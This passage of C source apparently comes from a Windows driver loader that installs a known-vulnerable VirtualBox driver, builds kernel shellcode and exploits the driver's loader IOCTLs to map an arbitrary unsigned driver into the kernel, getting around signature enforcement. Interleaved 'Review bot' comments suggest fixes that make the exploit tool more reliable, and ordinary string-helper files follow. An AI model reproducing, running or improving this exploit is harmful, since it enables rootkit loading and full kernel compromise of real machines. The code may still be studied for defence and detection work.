pLoadTask->u.In.EP.VMMR0.pvVMMR0EntryFast = ImageBase;
pLoadTask->u.In.EP.VMMR0.pvVMMR0EntryInt = ImageBase;
RtlCopyMemory(pLoadTask->u.In.achImage, Shellcode, CodeSize);
pLoadTask->u.In.cbImage = CodeSize;
if (!DeviceIoControl(g_hVBox, SUP_IOCTL_LDR_LOAD,
pLoadTask, pLoadTask->Hdr.cbIn,
pLoadTask, SUP_IOCTL_LDR_LOAD_SIZE_OUT, &bytesIO, NULL))
{
cuiPrintText(g_ConOut, TEXT("Ldr: SUP_IOCTL_LDR_LOAD call failed"), g_ConsoleOutput, TRUE);
break;
}
else {
_strcpy(text, TEXT("Ldr: SUP_IOCTL_LDR_LOAD, success\r\n\tShellcode mapped at 0x"));
u64tohex((ULONG_PTR)ImageBase, _strend(text));
_strcat(text, TEXT(", size = 0x"));
ultohex(CodeSize, _strend(text));
_strcat(text, TEXT("\r\n\tDriver image mapped at 0x"));
u64tohex((ULONG_PTR)ImageBase + scDataOffset, _strend(text));
cuiPrintText(g_ConOut, text, g_ConsoleOutput, TRUE);
}
RtlSecureZeroMemory(&vmFast, sizeof(vmFast));
vmFast.Hdr.u32Cookie = Cookie.u.Out.u32Cookie;
vmFast.Hdr.u32SessionCookie = Cookie.u.Out.u32SessionCookie;
vmFast.Hdr.rc = 0;
vmFast.Hdr.fFlags = SUPREQHDR_FLAGS_DEFAULT;
vmFast.Hdr.cbIn = SUP_IOCTL_SET_VM_FOR_FAST_SIZE_IN;
vmFast.Hdr.cbOut = SUP_IOCTL_SET_VM_FOR_FAST_SIZE_OUT;
vmFast.u.In.pVMR0 = (LPVOID)supImageHandle;
if (!DeviceIoControl(g_hVBox, SUP_IOCTL_SET_VM_FOR_FAST,
&vmFast, SUP_IOCTL_SET_VM_FOR_FAST_SIZE_IN,
&vmFast, SUP_IOCTL_SET_VM_FOR_FAST_SIZE_OUT, &bytesIO, NULL))
{
cuiPrintText(g_ConOut, TEXT("Ldr: SUP_IOCTL_SET_VM_FOR_FAST call failed"), g_ConsoleOutput, TRUE);
break;
}
else {
cuiPrintText(g_ConOut, TEXT("Ldr: SUP_IOCTL_SET_VM_FOR_FAST call complete"), g_ConsoleOutput, TRUE);
}
cuiPrintText(g_ConOut, TEXT("Ldr: SUP_IOCTL_FAST_DO_NOP"), g_ConsoleOutput, TRUE);
paramOut = 0;
DeviceIoControl(g_hVBox, SUP_IOCTL_FAST_DO_NOP,
NULL, 0,
&paramOut, sizeof(paramOut), &bytesIO, NULL);
cuiPrintText(g_ConOut, TEXT("Ldr: SUP_IOCTL_LDR_FREE"), g_ConsoleOutput, TRUE);
RtlSecureZeroMemory(&ldrFree, sizeof(ldrFree));
ldrFree.Hdr.u32Cookie = Cookie.u.Out.u32Cookie;
ldrFree.Hdr.u32SessionCookie = Cookie.u.Out.u32SessionCookie;
ldrFree.Hdr.cbIn = SUP_IOCTL_LDR_FREE_SIZE_IN;
ldrFree.Hdr.cbOut = SUP_IOCTL_LDR_FREE_SIZE_OUT;
ldrFree.Hdr.fFlags = SUPREQHDR_FLAGS_DEFAULT;
ldrFree.Hdr.rc = 0;
ldrFree.u.In.pvImageBase = ImageBase;
DeviceIoControl(g_hVBox, SUP_IOCTL_LDR_FREE,
&ldrFree, SUP_IOCTL_LDR_FREE_SIZE_IN,
&ldrFree, SUP_IOCTL_LDR_FREE_SIZE_OUT, &bytesIO, NULL);
break;
}
if (pLoadTask != NULL) {
memIO = 0;
NtFreeVirtualMemory(NtCurrentProcess(), &pLoadTask, &memIO, MEM_RELEASE);
}
if (g_hVBox != INVALID_HANDLE_VALUE) {
CloseHandle(g_hVBox);
g_hVBox = INVALID_HANDLE_VALUE;
}
}
/*
* TDLMapDriver
*
* Purpose:
*
* Build shellcode and execute exploit.
*
*/
UINT TDLMapDriver(
LPWSTR lpDriverFullName
)
{
UINT result = (UINT)-1;
ULONG isz;
SIZE_T memIO;
ULONG_PTR KernelBase, KernelImage = 0, xExAllocatePoolWithTag = 0, xPsCreateSystemThread = 0;
HMODULE Image = NULL;
PIMAGE_NT_HEADERS FileHeader;
PBYTE Buffer = NULL;
UNICODE_STRING uStr;
ANSI_STRING routineName;
NTSTATUS status;
WCHAR text[256];
KernelBase = supGetNtOsBase();
while (KernelBase != 0) {
_strcpy(text, TEXT("Ldr: Kernel base = 0x"));
u64tohex(KernelBase, _strend(text));
cuiPrintText(g_ConOut, text, g_ConsoleOutput, TRUE);
RtlSecureZeroMemory(&uStr, sizeof(uStr));
RtlInitUnicodeString(&uStr, lpDriverFullName);
status = LdrLoadDll(NULL, NULL, &uStr, (PVOID)&Image);
if ((!NT_SUCCESS(status)) || (Image == NULL)) {
cuiPrintText(g_ConOut, TEXT("Ldr: Error while loading input driver file"), g_ConsoleOutput, TRUE);
break;
}
else {
_strcpy(text, TEXT("Ldr: Input driver file loaded at 0x"));
u64tohex((ULONG_PTR)Image, _strend(text));
cuiPrintText(g_ConOut, text, g_ConsoleOutput, TRUE);
}
FileHeader = RtlImageNtHeader(Image);
if (FileHeader == NULL)
break;
isz = FileHeader->OptionalHeader.SizeOfImage;
cuiPrintText(g_ConOut, TEXT("Ldr: Loading ntoskrnl.exe"), g_ConsoleOutput, TRUE);
RtlInitUnicodeString(&uStr, L"ntoskrnl.exe");
status = LdrLoadDll(NULL, NULL, &uStr, (PVOID)&KernelImage);
if ((!NT_SUCCESS(status)) || (KernelImage == 0)) {
cuiPrintText(g_ConOut, TEXT("Ldr: Error while loading ntoskrnl.exe"), g_ConsoleOutput, TRUE);
break;
}
else {
_strcpy(text, TEXT("Ldr: ntoskrnl.exe loaded at 0x"));
u64tohex(KernelImage, _strend(text));
cuiPrintText(g_ConOut, text, g_ConsoleOutput, TRUE);
}
RtlInitString(&routineName, "ExAllocatePoolWithTag");
status = LdrGetProcedureAddress((PVOID)KernelImage, &routineName, 0, (PVOID)&xExAllocatePoolWithTag);
if ((!NT_SUCCESS(status)) || (xExAllocatePoolWithTag == 0)) {
cuiPrintText(g_ConOut, TEXT("Ldr: Error, ExAllocatePoolWithTag address not found"), g_ConsoleOutput, TRUE);
break;
}
else {
_strcpy(text, TEXT("Ldr: ExAllocatePoolWithTag 0x"));
u64tohex(KernelBase + (xExAllocatePoolWithTag - KernelImage), _strend(text));
cuiPrintText(g_ConOut, text, g_ConsoleOutput, TRUE);
}
RtlInitString(&routineName, "PsCreateSystemThread");
status = LdrGetProcedureAddress((PVOID)KernelImage, &routineName, 0, (PVOID)&xPsCreateSystemThread);
if ((!NT_SUCCESS(status)) || (xPsCreateSystemThread == 0)) {
cuiPrintText(g_ConOut, TEXT("Ldr: Error, PsCreateSystemThread address not found"), g_ConsoleOutput, TRUE);
break;
}
else {
_strcpy(text, TEXT("Ldr: PsCreateSystemThread 0x"));
u64tohex(KernelBase + (xPsCreateSystemThread - KernelImage), _strend(text));
cuiPrintText(g_ConOut, text, g_ConsoleOutput, TRUE);
}
memIO = isz + PAGE_SIZE;
NtAllocateVirtualMemory(NtCurrentProcess(), (PVOID)&Buffer, 0, &memIO,
MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE);
if (Buffer == NULL) {
cuiPrintText(g_ConOut, TEXT("Ldr: Error, unable to allocate shellcode"), g_ConsoleOutput, TRUE);
break;
}
else {
_strcpy(text, TEXT("Ldr: Shellcode allocated at 0x"));
u64tohex((ULONG_PTR)Buffer, _strend(text));
cuiPrintText(g_ConOut, text, g_ConsoleOutput, TRUE);
}
// mov rcx, ExAllocatePoolWithTag
// mov rdx, PsCreateSystemThread
Buffer[0x00] = 0x48; // mov rcx, xxxxx
Buffer[0x01] = 0xb9;
*((PULONG_PTR)&Buffer[2]) =
KernelBase + (xExAllocatePoolWithTag - KernelImage);
Buffer[0x0a] = 0x48; // mov rdx, xxxxx
Buffer[0x0b] = 0xba;
*((PULONG_PTR)&Buffer[0x0c]) =
KernelBase + (xPsCreateSystemThread - KernelImage);
RtlCopyMemory(Buffer + 0x14,
TDLBootstrapLoader_code, sizeof(TDLBootstrapLoader_code));
RtlCopyMemory(Buffer + scDataOffset, Image, isz);
cuiPrintText(g_ConOut, TEXT("Ldr: Resolving kernel import"), g_ConsoleOutput, TRUE);
TDLResolveKernelImport((ULONG_PTR)Buffer + scDataOffset, KernelImage, KernelBase);
cuiPrintText(g_ConOut, TEXT("Ldr: Executing exploit"), g_ConsoleOutput, TRUE);
TDLExploit(Buffer, isz + PAGE_SIZE);
result = 0;
break;
}
if (Buffer != NULL) {
memIO = 0;
NtFreeVirtualMemory(NtCurrentProcess(), &Buffer, &memIO, MEM_RELEASE);
}
return result;
}
/*
* TDLStartVulnerableDriver
*
* Purpose:
*
* Load vulnerable virtualbox driver and return handle for it device.
*
*/
HANDLE TDLStartVulnerableDriver(
VOID
)
{
PBYTE DrvBuffer;
ULONG DataSize = 0, bytesIO;
HANDLE hDevice = INVALID_HANDLE_VALUE;
WCHAR szDriverFileName[MAX_PATH * 2];
SC_HANDLE schSCManager = NULL;
LPWSTR msg;
DrvBuffer = supQueryResourceData(1, g_hInstance, &DataSize);
while (DrvBuffer != NULL) {
//lets give scm nice looking path so this piece of shit code from early 90x wont fuckup somewhere.
RtlSecureZeroMemory(szDriverFileName, sizeof(szDriverFileName));
if (!GetSystemDirectory(szDriverFileName, MAX_PATH)) {
cuiPrintText(g_ConOut,
TEXT("Ldr: Error loading VirtualBox driver, GetSystemDirectory failed"),
g_ConsoleOutput, TRUE);
break;
}
schSCManager = OpenSCManager(NULL,
NULL,
SC_MANAGER_ALL_ACCESS
);
if (schSCManager == NULL) {
cuiPrintText(g_ConOut,
TEXT("Ldr: Error opening SCM database"),
g_ConsoleOutput, TRUE);
break;
}
//lookup main vbox driver device, if found, try to unload all possible, unload order is sensitive
if (supIsObjectExists(L"\\Device", L"VBoxDrv")) {
cuiPrintText(g_ConOut,
TEXT("Ldr: Active VirtualBox found in system, attempt unload it"),
g_ConsoleOutput, TRUE);
if (scmStopDriver(schSCManager, TEXT("VBoxNetAdp"))) {
cuiPrintText(g_ConOut,
TEXT("SCM: VBoxNetAdp driver unloaded"),
g_ConsoleOutput, TRUE);
}
if (scmStopDriver(schSCManager, TEXT("VBoxNetLwf"))) {
cuiPrintText(g_ConOut,
TEXT("SCM: VBoxNetLwf driver unloaded"),
g_ConsoleOutput, TRUE);
}
if (scmStopDriver(schSCManager, TEXT("VBoxUSBMon"))) {
cuiPrintText(g_ConOut,
TEXT("SCM: VBoxUSBMon driver unloaded"),
g_ConsoleOutput, TRUE);
}
Sleep(1000);
if (scmStopDriver(schSCManager, TEXT("VBoxDrv"))) {
cuiPrintText(g_ConOut,
TEXT("SCM: VBoxDrv driver unloaded"),
g_ConsoleOutput, TRUE);
}
}
//if vbox installed backup it driver, do it before dropping our
if (g_VBoxInstalled) {
if (supBackupVBoxDrv(FALSE) == FALSE) {
cuiPrintText(g_ConOut,
TEXT("Ldr: Error while doing VirtualBox driver backup"),
g_ConsoleOutput, TRUE);
break;
}
}
//drop our vboxdrv version
_strcat(szDriverFileName, TEXT("\\drivers\\VBoxDrv.sys"));
bytesIO = (ULONG)supWriteBufferToFile(szDriverFileName, DrvBuffer,
(SIZE_T)DataSize, FALSE, FALSE);
if (bytesIO != DataSize) {
cuiPrintText(g_ConOut,
TEXT("Ldr: Error writing VirtualBox on disk"),
g_ConsoleOutput, TRUE);
break;
}
//if vbox not found in system install driver in scm
if (g_VBoxInstalled == FALSE) {
scmInstallDriver(schSCManager, VBoxDrvSvc, szDriverFileName);
}
//run driver
if (scmStartDriver(schSCManager, VBoxDrvSvc) == TRUE) {
if (scmOpenDevice(VBoxDrvSvc, &hDevice))
msg = TEXT("SCM: Vulnerable driver loaded and opened");
else
msg = TEXT("SCM: Driver device open failure");
}
else {
msg = TEXT("SCM: Vulnerable driver load failure");
}
cuiPrintText(g_ConOut, msg, g_ConsoleOutput, TRUE);
break;
}
//post cleanup
if (schSCManager != NULL) {
CloseServiceHandle(schSCManager);
}
return hDevice;
}
/*
* TDLStopVulnerableDriver
*
* Purpose:
*
* Unload previously loaded vulnerable driver. If VirtualBox installed - restore original driver.
*
*/
void TDLStopVulnerableDriver(
VOID
)
{
SC_HANDLE schSCManager;
LPWSTR msg;
UNICODE_STRING uStr;
OBJECT_ATTRIBUTES ObjectAttributes;
cuiPrintText(g_ConOut,
TEXT("SCM: Unloading vulnerable driver"),
g_ConsoleOutput, TRUE);
if (g_hVBox != INVALID_HANDLE_VALUE)
CloseHandle(g_hVBox);
schSCManager = OpenSCManager(NULL,
NULL,
SC_MANAGER_ALL_ACCESS
);
if (schSCManager == NULL) {
cuiPrintText(g_ConOut,
TEXT("SCM: Cannot open database, unable unload driver"),
g_ConsoleOutput, TRUE);
return;
}
//stop driver in any case
if (scmStopDriver(schSCManager, VBoxDrvSvc))
msg = TEXT("SCM: Vulnerable driver successfully unloaded");
else
msg = TEXT("SCM: Unexpected error while unloading driver");
cuiPrintText(g_ConOut, msg, g_ConsoleOutput, TRUE);
//if VBox not installed - remove from scm database and delete file
if (g_VBoxInstalled == FALSE) {
if (scmRemoveDriver(schSCManager, VBoxDrvSvc))
msg = TEXT("SCM: Driver entry removed from registry");
else
msg = TEXT("SCM: Error removing driver entry from registry");
cuiPrintText(g_ConOut, msg, g_ConsoleOutput, TRUE);
RtlInitUnicodeString(&uStr, L"\\??\\globalroot\\systemroot\\system32\\drivers\\VBoxDrv.sys");
InitializeObjectAttributes(&ObjectAttributes, &uStr, OBJ_CASE_INSENSITIVE, NULL, NULL);
if (NT_SUCCESS(NtDeleteFile(&ObjectAttributes)))
msg = TEXT("Ldr: Driver file removed");
else
msg = TEXT("Ldr: Error removing driver file");
cuiPrintText(g_ConOut, msg, g_ConsoleOutput, TRUE);
}
else {
//VBox software present, restore original driver and exit
if (supBackupVBoxDrv(TRUE))
msg = TEXT("Ldr: Original driver restored");
else
msg = TEXT("Ldr: Unexpected error while restoring original driver");
cuiPrintText(g_ConOut, msg, g_ConsoleOutput, TRUE);
}
CloseServiceHandle(schSCManager);
}
/*
* TDLProcessCommandLine
*
* Purpose:
*
* Extract target driver from command line and continue with it load.
*
*/
UINT TDLProcessCommandLine(
LPWSTR lpCommandLine
)
{
UINT retVal = (UINT)-1;
WCHAR szInputFile[MAX_PATH + 1];
ULONG c;
//input file
c = 0;
RtlSecureZeroMemory(szInputFile, sizeof(szInputFile));
GetCommandLineParam(lpCommandLine, 1, (LPWSTR)&szInputFile, MAX_PATH, &c);
if (c == 0) {
cuiPrintText(g_ConOut,
T_LOADERUSAGE,
g_ConsoleOutput, FALSE);
return retVal;
}
if (PathFileExists(szInputFile)) {
g_hVBox = TDLStartVulnerableDriver();
if (g_hVBox != INVALID_HANDLE_VALUE) {
retVal = TDLMapDriver(szInputFile);
TDLStopVulnerableDriver();
}
}
else {
cuiPrintText(g_ConOut,
TEXT("Ldr: Input file not found"),
g_ConsoleOutput, FALSE);
}
return retVal;
}
/*
* TDLMain
*
* Purpose:
*
* Loader main.
*
*/
void TDLMain()
{
BOOL cond = FALSE;
UINT uResult = 0;
DWORD dwTemp;
LONG x;
OSVERSIONINFOW osv;
WCHAR text[256];
__security_init_cookie();
do {
g_hInstance = GetModuleHandle(NULL);
g_ConOut = GetStdHandle(STD_OUTPUT_HANDLE);
if (g_ConOut == INVALID_HANDLE_VALUE) {
uResult = (UINT)-1;
break;
}
g_ConsoleOutput = TRUE;
if (!GetConsoleMode(g_ConOut, &dwTemp)) {
g_ConsoleOutput = FALSE;
}
SetConsoleTitle(T_LOADERTITLE);
SetConsoleMode(g_ConOut, ENABLE_LINE_INPUT | ENABLE_ECHO_INPUT | ENABLE_PROCESSED_OUTPUT);
if (g_ConsoleOutput == FALSE) {
WriteFile(g_ConOut, &BE, sizeof(WCHAR), &dwTemp, NULL);
}
cuiPrintText(g_ConOut,
T_LOADERINTRO,
g_ConsoleOutput, TRUE);
x = InterlockedIncrement((PLONG)&g_lApplicationInstances);
if (x > 1) {
cuiPrintText(g_ConOut,
T_LOADERRUN,
g_ConsoleOutput, FALSE);
uResult = (UINT)-1;
break;
}
//check version first
RtlSecureZeroMemory(&osv, sizeof(osv));
osv.dwOSVersionInfoSize = sizeof(osv);
RtlGetVersion((PRTL_OSVERSIONINFOW)&osv);
if (osv.dwMajorVersion < 6) {
cuiPrintText(g_ConOut,
T_LOADERUNSUP,
g_ConsoleOutput, FALSE);
uResult = (UINT)-1;
break;
}
_strcpy(text, TEXT("Ldr: Windows v"));
ultostr(osv.dwMajorVersion, _strend(text));
_strcat(text, TEXT("."));
ultostr(osv.dwMinorVersion, _strend(text));
_strcat(text, TEXT(" build "));
ultostr(osv.dwBuildNumber, _strend(text));
cuiPrintText(g_ConOut, text, g_ConsoleOutput, TRUE);
g_VBoxInstalled = TDLVBoxInstalled();
if (g_VBoxInstalled) {
cuiPrintText(g_ConOut,
TEXT("Ldr: Warning VirtualBox software installed, conficts possible"),
g_ConsoleOutput, TRUE);
}
uResult = TDLProcessCommandLine(GetCommandLine());
} while (cond);
InterlockedDecrement((PLONG)&g_lApplicationInstances);
ExitProcess(uResult);
}
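Review bot: TDLProcessCommandLine only calls TDLStopVulnerableDriver when TDLStartVulnerableDriver returned a usable device handle, but by that point TDLStartVulnerableDriver has already written the vulnerable VBoxDrv.sys into system32\drivers, overwritten the original when VirtualBox is installed, and (when it is not) registered the VBoxDrv service, so a failure in scmStartDriver or scmOpenDevice leaves the known-exploitable driver and its service entry on the machine with nothing to remove them. Hoisting the teardown out of the conditional fixes this, since TDLStopVulnerableDriver already reports rather than aborts on each step: `g_hVBox = TDLStartVulnerableDriver();` / `if (g_hVBox != INVALID_HANDLE_VALUE) retVal = TDLMapDriver(szInputFile);` / `TDLStopVulnerableDriver();` (assuming supBackupVBoxDrv(TRUE) copes with the backup-failed path, which cannot be confirmed from this file). Separately, TDLMapDriver copies TDLBootstrapLoader_code to Buffer + 0x14 and the driver image to Buffer + scDataOffset with nothing enforcing that the two do not overlap; a `C_ASSERT(0x14 + sizeof(TDLBootstrapLoader_code) <= scDataOffset);` next to the scDataOffset define would catch a rebuilt shellcode that grows past 0x200 bytes. TDLRelocImage is defined but never called in this file; if relocation is intentionally left to the kernel-side bootstrap, a one-line comment on the function saying so would stop a reader from assuming the user-mode image is relocated here.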


@ -0,0 +1,37 @@
#include "rtltypes.h"
char *_strcat_a(char *dest, const char *src)
{
if ( (dest==0) || (src==0) )
return dest;
while ( *dest!=0 )
dest++;
while ( *src!=0 ) {
*dest = *src;
dest++;
src++;
}
*dest = 0;
return dest;
}
wchar_t *_strcat_w(wchar_t *dest, const wchar_t *src)
{
if ( (dest==0) || (src==0) )
return dest;
while ( *dest!=0 )
dest++;
while ( *src!=0 ) {
*dest = *src;
dest++;
src++;
}
*dest = 0;
return dest;
}
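Review bot: _strcat_a and _strcat_w return the advanced `dest` pointer, i.e. a pointer to the new terminator rather than the start of the destination as CRT strcat does, and neither takes a destination capacity, so both facts belong in a header comment before someone uses the return value the strcat way, e.g. `/* Appends src to dest and returns a pointer to the new terminator (not to dest). dest must have room for strlen(dest)+strlen(src)+1 chars; no bounds check is made. */`. The NULL guard also returns dest unchanged, which means a NULL dest comes back as NULL; worth stating since main.c chains these helpers with _strend and u64tohex on fixed 256-character stack buffers.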


@ -0,0 +1,47 @@
#include "rtltypes.h"
int _strcmpi_a(const char *s1, const char *s2)
{
char c1, c2;
if ( s1==s2 )
return 0;
if ( s1==0 )
return -1;
if ( s2==0 )
return 1;
do {
c1 = locase_a(*s1);
c2 = locase_a(*s2);
s1++;
s2++;
} while ( (c1 != 0) && (c1 == c2) );
return (int)(c1 - c2);
}
int _strcmpi_w(const wchar_t *s1, const wchar_t *s2)
{
wchar_t c1, c2;
if ( s1==s2 )
return 0;
if ( s1==0 )
return -1;
if ( s2==0 )
return 1;
do {
c1 = locase_w(*s1);
c2 = locase_w(*s2);
s1++;
s2++;
} while ( (c1 != 0) && (c1 == c2) );
return (int)(c1 - c2);
}


@ -0,0 +1,43 @@
#include "rtltypes.h"
char *_strcpy_a(char *dest, const char *src)
{
char *p;
if ( (dest==0) || (src==0) )
return dest;
if (dest == src)
return dest;
p = dest;
while ( *src!=0 ) {
*p = *src;
p++;
src++;
}
*p = 0;
return dest;
}
wchar_t *_strcpy_w(wchar_t *dest, const wchar_t *src)
{
wchar_t *p;
if ((dest == 0) || (src == 0))
return dest;
if (dest == src)
return dest;
p = dest;
while ( *src!=0 ) {
*p = *src;
p++;
src++;
}
*p = 0;
return dest;
}


@ -0,0 +1,23 @@
#include "rtltypes.h"
char *_strend_a(const char *s)
{
if ( s==0 )
return 0;
while ( *s!=0 )
s++;
return (char *)s;
}
wchar_t *_strend_w(const wchar_t *s)
{
if ( s==0 )
return 0;
while ( *s!=0 )
s++;
return (wchar_t *)s;
}


@ -0,0 +1,27 @@
#include "rtltypes.h"
size_t _strlen_a(const char *s)
{
char *s0 = (char *)s;
if ( s==0 )
return 0;
while ( *s!=0 )
s++;
return (s-s0);
}
size_t _strlen_w(const wchar_t *s)
{
wchar_t *s0 = (wchar_t *)s;
if ( s==0 )
return 0;
while ( *s!=0 )
s++;
return (s-s0);
}


@ -0,0 +1,55 @@
#include "rtltypes.h"
int _strncmpi_a(const char *s1, const char *s2, size_t cchars)
{
char c1, c2;
if ( s1==s2 )
return 0;
if ( s1==0 )
return -1;
if ( s2==0 )
return 1;
if ( cchars==0 )
return 0;
do {
c1 = locase_a(*s1);
c2 = locase_a(*s2);
s1++;
s2++;
cchars--;
} while ( (c1 != 0) && (c1 == c2) && (cchars>0) );
return (int)(c1 - c2);
}
int _strncmpi_w(const wchar_t *s1, const wchar_t *s2, size_t cchars)
{
wchar_t c1, c2;
if ( s1==s2 )
return 0;
if ( s1==0 )
return -1;
if ( s2==0 )
return 1;
if ( cchars==0 )
return 0;
do {
c1 = locase_w(*s1);
c2 = locase_w(*s2);
s1++;
s2++;
cchars--;
} while ( (c1 != 0) && (c1 == c2) && (cchars>0) );
return (int)(c1 - c2);
}


@ -0,0 +1,180 @@
#include <windows.h>
BOOL GetCommandLineParamW(
IN LPCWSTR CmdLine,
IN ULONG ParamIndex,
OUT LPWSTR Buffer,
IN ULONG BufferSize,
OUT PULONG ParamLen
)
{
ULONG c, plen = 0;
TCHAR divider;
if (ParamLen != NULL)
*ParamLen = 0;
if (CmdLine == NULL) {
if ((Buffer != NULL) && (BufferSize > 0))
*Buffer = 0;
return FALSE;
}
for (c = 0; c <= ParamIndex; c++) {
plen = 0;
while (*CmdLine == ' ')
CmdLine++;
switch (*CmdLine) {
case 0:
goto zero_term_exit;
case '"':
CmdLine++;
divider = '"';
break;
default:
divider = ' ';
}
while ((*CmdLine != '"') && (*CmdLine != divider) && (*CmdLine != 0)) {
plen++;
if (c == ParamIndex)
if ((plen < BufferSize) && (Buffer != NULL)) {
*Buffer = *CmdLine;
Buffer++;
}
CmdLine++;
}
if (*CmdLine != 0)
CmdLine++;
}
zero_term_exit:
if ((Buffer != NULL) && (BufferSize > 0))
*Buffer = 0;
if (ParamLen != NULL)
*ParamLen = plen;
if (plen < BufferSize)
return TRUE;
else
return FALSE;
}
BOOL GetCommandLineParamA(
IN LPCSTR CmdLine,
IN ULONG ParamIndex,
OUT LPSTR Buffer,
IN ULONG BufferSize,
OUT PULONG ParamLen
)
{
ULONG c, plen = 0;
TCHAR divider;
if (CmdLine == NULL)
return FALSE;
if (ParamLen != NULL)
*ParamLen = 0;
for (c = 0; c <= ParamIndex; c++) {
plen = 0;
while (*CmdLine == ' ')
CmdLine++;
switch (*CmdLine) {
case 0:
goto zero_term_exit;
case '"':
CmdLine++;
divider = '"';
break;
default:
divider = ' ';
}
while ((*CmdLine != '"') && (*CmdLine != divider) && (*CmdLine != 0)) {
plen++;
if (c == ParamIndex)
if ((plen < BufferSize) && (Buffer != NULL)) {
*Buffer = *CmdLine;
Buffer++;
}
CmdLine++;
}
if (*CmdLine != 0)
CmdLine++;
}
zero_term_exit:
if ((Buffer != NULL) && (BufferSize > 0))
*Buffer = 0;
if (ParamLen != NULL)
*ParamLen = plen;
if (plen < BufferSize)
return TRUE;
else
return FALSE;
}
char *ExtractFilePathA(const char *FileName, char *FilePath)
{
char *p = (char *)FileName, *p0 = (char *)FileName;
if ((FileName == 0) || (FilePath == 0))
return 0;
while (*FileName != 0) {
if (*FileName == '\\')
p = (char *)FileName + 1;
FileName++;
}
while (p0 < p) {
*FilePath = *p0;
FilePath++;
p0++;
}
*FilePath = 0;
return FilePath;
}
wchar_t *ExtractFilePathW(const wchar_t *FileName, wchar_t *FilePath)
{
wchar_t *p = (wchar_t *)FileName, *p0 = (wchar_t *)FileName;
if ((FileName == 0) || (FilePath == 0))
return 0;
while (*FileName != 0) {
if (*FileName == '\\')
p = (wchar_t *)FileName + 1;
FileName++;
}
while (p0 < p) {
*FilePath = *p0;
FilePath++;
p0++;
}
*FilePath = 0;
return FilePath;
}
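Review bot: GetCommandLineParamA returns FALSE on a NULL CmdLine before touching Buffer or ParamLen, while GetCommandLineParamW zeroes `*ParamLen` and `*Buffer` first, so the two variants leave different output state on the same error path; move the `if (ParamLen != NULL) *ParamLen = 0;` and the `*Buffer = 0` initialisation ahead of the NULL check in the A variant to match. Both functions declare `TCHAR divider`, whose width follows the UNICODE define even though each function is fixed-width; `char divider` and `WCHAR divider` say what is meant (the comparisons only work today because of integer promotion). ExtractFilePathA/W copy into FilePath with no length argument; a comment that FilePath must be at least as large as FileName would document the contract callers have to meet.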


@ -0,0 +1,35 @@
#ifndef _CMDLINEH_
#define _CMDLINEH_
BOOL GetCommandLineParamW(
IN LPCWSTR CmdLine,
IN ULONG ParamIndex,
OUT LPWSTR Buffer,
IN ULONG BufferSize,
OUT PULONG ParamLen
);
BOOL GetCommandLineParamA(
IN LPCSTR CmdLine,
IN ULONG ParamIndex,
OUT LPSTR Buffer,
IN ULONG BufferSize,
OUT PULONG ParamLen
);
char *ExtractFilePathA(const char *FileName, char *FilePath);
wchar_t *ExtractFilePathW(const wchar_t *FileName, wchar_t *FilePath);
#ifdef UNICODE
#define ExtractFilePath ExtractFilePathW
#define GetCommandLineParam GetCommandLineParamW
#else // ANSI
#define ExtractFilePath ExtractFilePathA
#define GetCommandLineParam GetCommandLineParamA
#endif
#endif /* _CMDLINEH_ */


@ -0,0 +1,155 @@
/*
Module name:
minirtl.h
Description:
header for string handling and conversion routines
Date:
1 Mar 2015
*/
#ifndef _MINIRTL_
#define _MINIRTL_
// string copy/concat/length
char *_strend_a(const char *s);
wchar_t *_strend_w(const wchar_t *s);
char *_strcpy_a(char *dest, const char *src);
wchar_t *_strcpy_w(wchar_t *dest, const wchar_t *src);
char *_strcat_a(char *dest, const char *src);
wchar_t *_strcat_w(wchar_t *dest, const wchar_t *src);
char *_strncpy_a(char *dest, size_t ccdest, const char *src, size_t ccsrc);
wchar_t *_strncpy_w(wchar_t *dest, size_t ccdest, const wchar_t *src, size_t ccsrc);
size_t _strlen_a(const char *s);
size_t _strlen_w(const wchar_t *s);
// comparing
int _strcmp_a(const char *s1, const char *s2);
int _strcmp_w(const wchar_t *s1, const wchar_t *s2);
int _strncmp_a(const char *s1, const char *s2, size_t cchars);
int _strncmp_w(const wchar_t *s1, const wchar_t *s2, size_t cchars);
int _strcmpi_a(const char *s1, const char *s2);
int _strcmpi_w(const wchar_t *s1, const wchar_t *s2);
int _strncmpi_a(const char *s1, const char *s2, size_t cchars);
int _strncmpi_w(const wchar_t *s1, const wchar_t *s2, size_t cchars);
char *_strstr_a(const char *s, const char *sub_s);
wchar_t *_strstr_w(const wchar_t *s, const wchar_t *sub_s);
char *_strstri_a(const char *s, const char *sub_s);
wchar_t *_strstri_w(const wchar_t *s, const wchar_t *sub_s);
// conversion of integer types to string, returning string length
size_t ultostr_a(unsigned long x, char *s);
size_t ultostr_w(unsigned long x, wchar_t *s);
size_t ultohex_a(unsigned long x, char *s);
size_t ultohex_w(unsigned long x, wchar_t *s);
size_t itostr_a(int x, char *s);
size_t itostr_w(int x, wchar_t *s);
size_t i64tostr_a(signed long long x, char *s);
size_t i64tostr_w(signed long long x, wchar_t *s);
size_t u64tostr_a(unsigned long long x, char *s);
size_t u64tostr_w(unsigned long long x, wchar_t *s);
size_t u64tohex_a(unsigned long long x, char *s);
size_t u64tohex_w(unsigned long long x, wchar_t *s);
// string to integers conversion
unsigned long strtoul_a(char *s);
unsigned long strtoul_w(wchar_t *s);
unsigned long long strtou64_a(char *s);
unsigned long long strtou64_w(wchar_t *s);
unsigned long hextoul_a(char *s);
unsigned long hextoul_w(wchar_t *s);
int strtoi_a(char *s);
int strtoi_w(wchar_t *s);
signed long long strtoi64_a(char *s);
signed long long strtoi64_w(wchar_t *s);
unsigned long long hextou64_a(char *s);
unsigned long long hextou64_w(wchar_t *s);
/* =================================== */
#ifdef UNICODE
#define _strend _strend_w
#define _strcpy _strcpy_w
#define _strcat _strcat_w
#define _strlen _strlen_w
#define _strncpy _strncpy_w
#define _strcmp _strcmp_w
#define _strncmp _strncmp_w
#define _strcmpi _strcmpi_w
#define _strncmpi _strncmpi_w
#define _strstr _strstr_w
#define _strstri _strstri_w
#define ultostr ultostr_w
#define ultohex ultohex_w
#define itostr itostr_w
#define i64tostr i64tostr_w
#define u64tostr u64tostr_w
#define u64tohex u64tohex_w
#define strtoul strtoul_w
#define hextoul hextoul_w
#define strtoi strtoi_w
#define strtoi64 strtoi64_w
#define strtou64 strtou64_w
#define hextou64 hextou64_w
#else // ANSI
#define _strend _strend_a
#define _strcpy _strcpy_a
#define _strcat _strcat_a
#define _strlen _strlen_a
#define _strncpy _strncpy_a
#define _strcmp _strcmp_a
#define _strcmp _strcmp_a
#define _strncmp _strncmp_a
